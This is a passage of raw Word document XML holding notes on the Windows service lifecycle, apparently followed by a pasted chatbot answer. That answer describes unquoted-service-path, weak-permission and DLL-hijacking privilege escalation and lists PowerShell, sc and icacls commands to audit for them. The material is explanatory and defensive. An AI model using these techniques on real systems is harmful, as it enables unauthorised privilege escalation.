        <w:t>At system boot or when a user requests, the SCM reads service configurations and manages their state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DDB1D9" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:lastRenderedPageBreak/>
        <w:t>Services can be set to start automatically (at boot), manually (on demand), or be disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC9377" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB240EE" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">SCM launches the service’s executable or loads the driver binary, running it under the configured account (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>LocalSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>NetworkService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>, or a custom user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6371B84F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>The service initializes and enters a running state, ready to perform its functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8A457" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728557D2" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>The service runs in the background, often without user interaction, performing tasks like handling network connections, managing hardware, or running scheduled jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008718AA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>It communicates with the SCM through the Service Control Interface to report status and accept control commands (start, stop, pause, resume).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9F185" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Stop/Restart:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33436B43" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>The SCM can stop or restart services as needed, for example during shutdown or manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76B684" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>When stopped, the service should release resources and exit gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144C33D" w14:textId="20E54C8E" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="62FBBBE0" w14:textId="1653D5B1" w:rsidR="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="2646442D" w14:textId="77777777" w:rsidR="00A26590" w:rsidRPr="005F49FC" w:rsidRDefault="00A26590" w:rsidP="005F49FC"/>
    <w:p w14:paraId="58207B31" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4712853D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D0BC68" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Awesome! Here are some </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real-world attack examples</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">, plus </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>commands and tools</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> commonly used to audit and test Windows Services for security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8B15C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="388E62B1">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918C627" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-World Attack Examples on Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367694B2" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unquoted Service Path Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3331EC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>A service’s executable path contains spaces but is not enclosed in quotes. When Windows tries to start the service, it parses the path incorrectly and may execute a malicious binary placed earlier in the path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F32F5" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Service path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B229D2D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>C:\Program Files\My Service\svc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4755B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>If unquoted, Windows tries to run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5246EBC4" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>C:\Program.exe (if it exists),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CF9187" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>then C:\Program Files\My.exe, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E9AEC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Attacker places a malicious executable as C:\Program.exe. When the service starts, the malicious executable runs with the service’s privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A1006" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak File Permissions on Service Executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58258A2C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:lastRenderedPageBreak/>
        <w:t>If svc.exe or its folder is writable by a low-privileged user, the attacker can replace or modify the executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332AB94" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>When the service starts/restarts, attacker’s code runs with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED0E54" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DLL Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564B83E2" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Some services load DLLs without full paths or from working directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F4700" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Attacker places a malicious DLL in a directory where the service searches first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272392EF" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Service loads the malicious DLL, leading to code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC89CB0" w14:textId="05699B50" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="1D2FD8D1" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Useful Commands to Audit Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D8B56" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query service configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F75208" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> qc &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>service_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012FD68" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Shows binary path, service type, start type, and account used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03906C55" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List all services with binary paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56989B6B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>WmiObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> win32_service | Select-Object Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>StartMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">, State, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>StartName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="378F4DF5" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Gives an overview of services and their executable paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAE9409" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check for unquoted service paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3771E38E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>WmiObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> win32_service | Where-Object </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>{ $_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> -and $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>notmatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> '^</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>".*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>"$' -and $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> -match '\s</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>' }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> | Select-Object Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>PathName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27338099" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Lists services where the path has spaces but is not quoted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD94864" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check permissions on service executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BB2A3A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> to check permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4FBD54" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> "C:\Path\To\ServiceExecutable.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241EF338" w14:textId="3F780D2D" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="52656B8E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools for Windows Service Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC19FA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Autoruns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD5B2B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Graphically shows services, drivers, and auto-start locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FF682C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Useful to detect suspicious or misconfigured services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C3B07" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AccessChk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F812341" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Checks permissions on service executables and registry keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483258CB" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E85380A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
